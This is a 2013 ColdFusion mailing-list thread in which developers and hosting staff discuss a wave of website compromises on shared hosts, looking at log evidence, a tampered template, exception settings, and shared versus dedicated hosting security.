RE: New Round of Exploits going on

2013-02-15 Thread Revolution

Why not just get your own server?



-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk] 
Sent: Tuesday, February 12, 2013 5:54 AM
To: cf-talk
Subject: Re: New Round of Exploits going on


Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354530
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


RE: New Round of Exploits going on

2013-02-15 Thread Stephens, Larry V

Maybe, money?

 

-Original Message-
From: Revolution [mailto:houseoffusion_...@internetemail.info] 
Sent: Friday, February 15, 2013 7:56 AM
To: cf-talk
Subject: RE: New Round of Exploits going on


Why not just get your own server?
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354535


RE: New Round of Exploits going on

2013-02-15 Thread Russ Michaels

And skills. Did you actually read the discussion?

Regards
Russ Michaels
www.michaels.me.uk
www.cfmldeveloper.com - Free CFML hosting for developers
www.cfsearch.com - CF search engine
On Feb 15, 2013 9:13 PM, Stephens, Larry V steph...@iu.edu wrote:


 Maybe, money?
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354537


Re: New Round of Exploits going on

2013-02-12 Thread Russ Michaels

Byron,

That is partly true, if you make certain assumptions, but things are not
quite that simple, considering the following.

Let's say you get your own server to host your own site.
And that is it: you do not do any kind of lockdown, do not keep your
patches and hotfixes up to date, do no monitoring whatsoever.
Then yes, in such a scenario the shared server will be safer in general
because your server as a whole is not secure, so a vulnerability on the
server is more likely.
So getting a server with no idea what you're doing and no management or
support would be pretty dumb. If you do not have the skills to manage it
yourself and make sure it is secure then you should be paying your host or
someone else to do this for you.


However if you are running a server with *ONLY* your own site on it, your
chances of being attacked in the first place are much less than on a shared
server.
Consider that a shared server is going to have *AT LEAST* 200 other sites
on it, probably more, and attackers generally target a list of
domains/websites rather than the server itself when looking for
vulnerabilities, so that is a 20,000% increase in your chances of being
hacked due to other websites on the server already.

Let's also consider that your own site is written in CF, and so CF is the
only thing you would have installed on your own server.
So you only have one application layer attack vector.
But on a shared server you're also going to have ASP, .NET, Perl, PHP, Ruby
and probably more, so that has just increased the possible attack vectors
by at least another 500%.





On Tue, Feb 12, 2013 at 6:37 AM, Byron Mann byronos...@gmail.com wrote:
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354474


Re: New Round of Exploits going on

2013-02-11 Thread Russ Michaels

Unfortunately Andrew, things are never that simple.
For every customer like yourself who wants this turned off, there will be
100 customers who want it turned on.

Most people do not know about or care about the security side of hosting,
and just want everything enabled, which makes their life easier.
So as soon as they hear the word disabled, their initial response will be
things like:
1) Our previous host did not do this
2) Then we will have to look for another host

Many hosts, I'm sure, are simply giving in to the demands of the majority of
their customers and providing them with the services they want even though
they are insecure.

I regularly explain to customers/developers why cfexecute is disabled, why
they do not have read/write access to the entire server, why
createobject(java) is disabled by default, and in general why things
have to be locked down on a shared server.
We do however stick to our main security policies, so our servers are more
secure than most, but this of course comes at a cost as many customers
simply will not accept such restrictions and would rather go and find an
insecure host instead.

At the end of the day, if you want security and control over your hosting
environment the solution is simple: DO NOT USE SHARED HOSTING.






On Mon, Feb 11, 2013 at 5:32 AM, Andrew Scott andr...@andyscott.id.au wrote:


 One thing I hate about some hosting companies is that they have Robust
 Exceptions switched on, but what concerns me even more is that they don't
 care that this is a security risk... If your hosting company is one of
 them, get in their ears about having it switched off.

 If they refuse then it's time for a change.



--

Russ Michaels

www.bluethunderinternet.com  : Business hosting services & solutions
www.cfmldeveloper.com: ColdFusion developer community
www.michaels.me.uk   : my blog
www.cfsearch.com : ColdFusion search engine
*skype me* : russmichaels


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354448


Re: New Round of Exploits going on

2013-02-11 Thread Andrew Scott

Yeah I guess, but that is why there are log files, so there is really no
excuse. But how cost efficient would it be to just move those people over
to their own server so they can affect themselves?

And I would bet that it is these people who also turn off UAC on Windows
and get all types of infections and could very well be the ones FTPing up
infected files to begin with.

Russ, I hear you, but then maybe they are better off elsewhere if they can't
understand the implications.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk wrote:
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354449


Re: New Round of Exploits going on

2013-02-11 Thread Russ Michaels

Unfortunately no host can afford to tell all their customers you're better
off elsewhere.
It would not be cost efficient at all to give a shared hosting customer
their own server for the same price; they would lose money, I doubt the
cost would even be remotely covered.

Both of those solutions would put any host out of business very quickly.


On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott andr...@andyscott.id.au wrote:
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354450


Re: New Round of Exploits going on

2013-02-11 Thread Andrew Scott

Russ, I never meant their own server. I meant put all customers who want
the robust onto the same server.

But I did raise an enhancement with Adobe, where my suggestion is to have
robust exceptions off by default and not be able to enable or disable from
the CF admin. However if the customer wants to exploit their own site then
they have the option to turn that level of exception on in the
Application.cfc.



On Tue, Feb 12, 2013 at 3:05 AM, Russ Michaels r...@michaels.me.uk wrote:
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354452


Re: New Round of Exploits going on

2013-02-11 Thread Russ Michaels

I would not think that is a cost effective solution either as there is such
a small number of customers who would request to be on a secure server.
We offer something like that called semi-dedicated, but it is more
expensive.

If CF had a web admin like Railo, it would solve all those type of issues
really.


On Mon, Feb 11, 2013 at 4:21 PM, Andrew Scott andr...@andyscott.id.au wrote:
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354456


Re: New Round of Exploits going on

2013-02-11 Thread Matthew Williams

IF, and it's a large IF, but IF you're willing to maintain your own
machine, then a slicehost with an open source CFML engine isn't all that
much more expensive than a shared hosting plan.  For $20 USD a month you
can have a linode running whatever flavor of headless linux that you
want.  Throw on Webmin/Virtualmin to handle site creation and updates.
Throw on Railo on Tomcat.  MySQL for DB, apache to serve web traffic.
Use IPTables to lock down all but SSH/HTTP/HTTPS/FTP/DNS.  Virtualmin can
be set to automatically check for package updates and deploy them on a
set schedule.  It can back up to an S3 bucket.  Railo can be set to
update automatically as well.  Everything that is running is basically
free; it's just going to cost you in time if you're not familiar with it.

Now, the cost in time for setup?  That's going to be higher than just
going with a shared host, but I personally found that my time is far
offset against dealing with the latest issues that have come up with
vulnerabilities.

NOTE: this doesn't address PCI compliance as I've not had to go down
that route.  In that instance shared may still yet be cheaper, but given
the prices I've seen on shared hosts that are PCI compliant, I still
think it'd be cheaper to roll your own.  But then, I'm able to do the
admin and dev side of things.

-- 
Matthew Williams
Geodesic GraFX
www.geodesicgrafx.com/blog
twitter.com/ophbalance


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354457


Re: New Round of Exploits going on

2013-02-11 Thread Leigh

 Les Mizzell wrote:
 So, anybody know what this is doing?
 Allaire Cold Fusion Template

Something similar came up on StackOverflow last week (possibly the same 
exploit). That guy said the old AB Positive Encrypt and Decrypt utility was 
able to decrypt the file:
http://www.adobe.com/cfusion/exchange/index.cfm?event=extensionDetail&extid=1007043

-Leigh




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354458


Re: New Round of Exploits going on

2013-02-11 Thread Andrew Scott

Well I guess the ticket I raised is too late.

One can already do this:

<cfset this.enablerobustexception = true />





On Tue, Feb 12, 2013 at 3:53 AM, Leigh cfsearch...@yahoo.com wrote:
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354468


Re: New Round of Exploits going on

2013-02-11 Thread Byron Mann

(apologies for the length)

Russ,

I can tell by your comments that you either have dealt with a lot of hosts
or have worked or owned one. Well said.

Having worked in the Hosting space for more than 10 years now, I can safely
say there is absolutely no 100% way to prevent these exploits on any
platform.

That is not to say there are not more secure options than shared hosting,
but even at that you may need the above average skill set. I can make an
argument that shared CF hosting is probably more secure for half the people
using Coldfusion out there.

How and why?

Well most probably have no one actively monitoring their servers. Not only
do we have ourselves and tools looking at the servers, but our customers
who make us instantly aware of an issue.

Even a subpar host probably has a better lock down on CF than many non-host-managed
CF users.

How many can say they don't have rootkits (or even know what that is)
running on their server? Probably a lot on this list, but the average vps,
cloud or dedicated user out there, ummm probably not.

Example, there was a recent issue we had with hidden elements being
injected to files on a shared server. This was actually a customer running
Wordpress. How many out there would have found that and how quickly, say on
a dedicated server with a site that only gets updated once a month.

The best you can do is be vigilant, do your patching and homework and when
the next compromise comes, take it on the cheek, mitigate, and take what
you learned and try to improve for the next go around.

And if you are a hosting customer, it's up to you to be aware and educated
on what a host should and shouldn't be doing (aka this list). And then
decide if it's time to move on or acceptable to you.

Of course I'm speaking in general terms, as this is the case with not only
CF, but all platforms. How many times a week do we hear about a drupal or
Wordpress issue? Just about as often as CF, if not more.

Quick fact, we have more dedicated, vps, cloud (vms) revenue affected by
compromises than our shared customers.

But let's not all forget the real problem here. It's not cf users, the host
or Adobe's fault. It's the dirt bags out there who make escalations happen
that result in the 3 am phone calls.

Byron Mann
Lead Engineer & Architect
HostMySite.com


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354470
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


New Round of Exploits going on

2013-02-10 Thread Andrew Scott

It appears that there are either Web Developers running sites with current
infections, or there is a new round happening.

I have seen one site hacked twice in the last two weeks, and although they
were never able to run the code, there is very little evidence that this
exploit is from the web site it was found on.

However the one thing that I noticed in the logs at the time of the
modified HTML file, and yes they only modified HTML files and not CFML
files, was that I found a HEAD request in the logs that came from a website
that looked suspicious. When I googled this domain my AntiVirus detected
this as a Black Hole Security Exploit, but what was worrying was that this
log with the domain had the website that was hacked in the log. And it
looks like this with the details changed to protect both parties.

2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain/?info/domainattacked 301 0 0 225 432 125

Now you can see that this was redirected, but if there is a known exploit
these guys are still able to do this. As was evident with the latest
Anonymous attacks.

I encourage people to look at their websites and check to see if they have
been infected with this new wave. I have gone through the logs of the
website in question and there is no evidence that it was infected directly
through the website, except for that one line in the log mentioned above.

What really shocks me even more, is that the hosting company refuses
to acknowledge that they may be responsible, which is fair enough if this
website did not have all the checks to sanitize all form inputs with Anti
Sammy. And there is also no evidence that this is a SQL Injected attack
either, which is near impossible unless there is a known bug with hibernate
and its current binding of variables. Aka cfqueryparam for hibernate.

Anyway as some people have mentioned that they have been attacked in the
last few weeks, I wanted to share this as there seems to be a new exploit
going around that may or may not be related to ColdFusion on shared hosts,
but they seem to not care who they are infecting.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443
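The log line quoted above is an IIS W3C extended entry. As an added example (not code from Andrew's post or from any project on this list), here is a small Python scan that parses lines in that field order and flags what he describes: a HEAD request whose Referer comes from a foreign host and carries the attacked site's own hostname in its path. The field order is the IIS default and is assumed, and the hosts, addresses and sample lines are constructed.

```python
from urllib.parse import urlsplit

# Field order of the IIS W3C extended log line quoted in the post; this is
# the IIS default field set and is assumed here, not stated in the message.
FIELDS = ("date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)",
          "sc-status", "sc-substatus", "sc-win32-status", "sc-bytes",
          "cs-bytes", "time-taken")

def parse_line(line):
    """Split one W3C log line into a dict; skip directives and malformed lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def suspicious_referers(lines, own_hosts):
    """Return (line_no, referer_host, reason) for entries whose Referer is a
    host we do not own and which look like the probe in the quoted log:
    a HEAD request, and/or our own hostname embedded in the referer path."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        ref = rec["cs(Referer)"].lower()
        host = urlsplit(ref).hostname if ref != "-" else None
        if not host or host in own:
            continue
        reasons = []
        if rec["cs-method"] == "HEAD":
            reasons.append("HEAD probe with external referer")
        if any(h in ref.split(host, 1)[1] for h in own):
            reasons.append("own hostname embedded in referer")
        if reasons:
            hits.append((n, host, "; ".join(reasons)))
    return hits

# Constructed sample log (placeholder addresses and hosts, same layout as the post).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2013-02-06 01:43:48 10.0.0.5 HEAD / - 80 - 192.0.2.10 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://bad.example/?info/www.example.com 301 0 0 225 432 125
2013-02-06 01:44:02 10.0.0.5 GET /index.cfm - 80 - 192.0.2.11 Mozilla/5.0+(Windows+NT+6.1) http://www.example.com/ 200 0 0 5120 300 15
2013-02-06 01:44:10 10.0.0.5 GET /about.cfm - 80 - 192.0.2.12 Mozilla/5.0 - 200 0 0 4096 280 12
2013-02-06 01:45:00 10.0.0.5 GET /index.cfm - 80 - 192.0.2.13 Mozilla/5.0 http://search.example.net/ 200 0 0 5120 310 20
"""

if __name__ == "__main__":
    for hit in suspicious_referers(SAMPLE_LOG.splitlines(), {"www.example.com"}):
        print(hit)
```

Ordinary external referers (the search engine line) are left alone; only the combination seen in the post is reported, which keeps the output short enough to read by hand.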


Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell

I just got the below on a site. Not sure how to decrypt to tell exactly 
what it's doing though.
Client noticed that Google had flagged the site as 'compromised'.

I'm pointing my finger at the hosting company - they've got a security 
issue if this can happen, correct?

So, anybody know what this is doing?

-

Allaire Cold Fusion Template
Header Size: New 

Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott

One thing I hate about some hosting companies is that they have Robust
Exceptions switched on, but what concerns me even more is that they don't
care that this is a security risk... If your hosting company is one of
them, get in their ears about having it switched off.

If they refuse then it's time for a change.

Also as a caution not a rule, if you're lucky enough to have the time, look
into using any framework that supports MVC and SES rewrites, this has
stopped them in their tracks as they are not able to run the uploaded code.
Not with ease at least anyway.

Still I am not sure how they are uploading these files, as there is nothing
in the logs that indicates this. I am guessing that something else on the
server is compromised and because they are able to and do look for
exceptions being displayed to the screen they now know where to start
spreading their malware. My guess is there is an exploit still known and not
public that is bypassing all sand boxing at the moment.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445


Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell

  Still I am not sure how they are uploading these files
  as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the 
ORIGINAL creation date on it - 2011 something - although it was altered 
last week. So, a search of all the site files for anything recently 
altered showed nothing.

Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446


Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott

That would indicate that they were able to get the file stamp before
modifying it and reapplying the time stamp. Extreme long shot, but who
knows how they are doing this.

-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell lesm...@bellsouth.net wrote:


   Still I am not sure how they are uploading these files
   as there is nothing in the logs that indicates this.

 For mine in the previous message, the altered file still had the
 ORIGINAL creation date on it - 2011 something - although it was altered
 last week. So, a search of all the site files for anything recently
 altered showed nothing.

 

Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447
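Les's and Andrew's exchange about the altered file keeping its original date is the case for checking content rather than timestamps. As an added example (not code from either poster), the following Python keeps a SHA-256 manifest of the web files and diffs it; the demo function builds the scenario they describe, altering a page and putting its mtime back, and shows that a recently-modified search finds nothing while the hash diff does. The file extensions, paths and the injected snippet are assumed and constructed.

```python
import hashlib
import os
import tempfile
import time

def build_manifest(root, exts=(".cfm", ".cfc", ".html", ".htm", ".js")):
    """Map each web file under root (relative path) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):   # assumed set of web file types
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest

def diff_manifests(baseline, current):
    """Files added, removed or changed since the baseline, judged by content only."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }

def demo_preserved_timestamp():
    """Constructed scenario: a page is altered while its mtime is put back, so a
    'recently modified' search misses it but the hash diff does not.
    Returns (recently_modified_files, manifest_diff)."""
    with tempfile.TemporaryDirectory() as root:
        page = os.path.join(root, "index.html")
        with open(page, "w") as fh:
            fh.write("<html><body>hello</body></html>")
        old = time.time() - 400 * 86400           # pretend the file dates from long ago
        os.utime(page, (old, old))
        baseline = build_manifest(root)           # taken while the site was clean
        with open(page, "a") as fh:               # the kind of hidden element Byron mentions
            fh.write('<div style="display:none">injected</div>')
        os.utime(page, (old, old))                # timestamp restored to its old value
        week_ago = time.time() - 7 * 86400
        recent = [p for p in baseline if os.path.getmtime(os.path.join(root, p)) > week_ago]
        return recent, diff_manifests(baseline, build_manifest(root))

if __name__ == "__main__":
    print(demo_preserved_timestamp())
```

The baseline should be stored off the web server (or at least outside the web root), since anyone who can rewrite a page can rewrite a manifest sitting beside it.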